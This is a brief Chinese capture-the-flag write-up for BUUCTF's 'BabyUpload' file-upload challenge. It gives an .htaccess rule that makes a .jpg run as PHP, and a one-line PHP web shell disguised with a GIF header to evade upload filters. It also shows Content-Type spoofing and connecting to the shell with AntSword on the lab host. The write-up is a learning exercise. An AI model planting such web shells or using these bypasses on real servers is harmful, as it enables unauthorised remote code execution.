buuctf-BabyUpload
前言
之前整理了一些upload-lab的知识,为了学到更多有关文件上传的知识,想着透过题目练习一下。
话不多说,整活~
解题
我们先打开此题的链接。还是我们需要上传文件
此题的Content-Type为image/jpeg
而且我们需要上传一个.htaccess文件。内容如下:
<FilesMatch "1.jpg">//这里的文件名是要与之后你上传的一句木马的文件保持一致的 SetHandler application/x-httpd-php </FilesMatch>
我们的一句话木马内容如下:
GIF89a? <script language="php">eval($_POST['a']);</script>
因为文件名后缀不能是 ph 开头,文件内容过滤<?
好,我们先上传htaccess文件,用bp抓包检查一手。
这里的文件类型一定要改成image/jpeg
上传成功,下一步我们再上传jpg文件,一句话木马
上传成功。
最后用蚁剑连接,路径为
http://76ebb94d-84e4-48c1-88df-83517130c760.node3.buuoj.cn/upload/0afb3cc4b734e045c221137554c5b0cd/1.jp
连接成功得到flag
若对以上的一些知识点有一些不了解,可参考文件上传
本人对于文件上传也是在上传中,若解答有误,请联系我。谢谢!!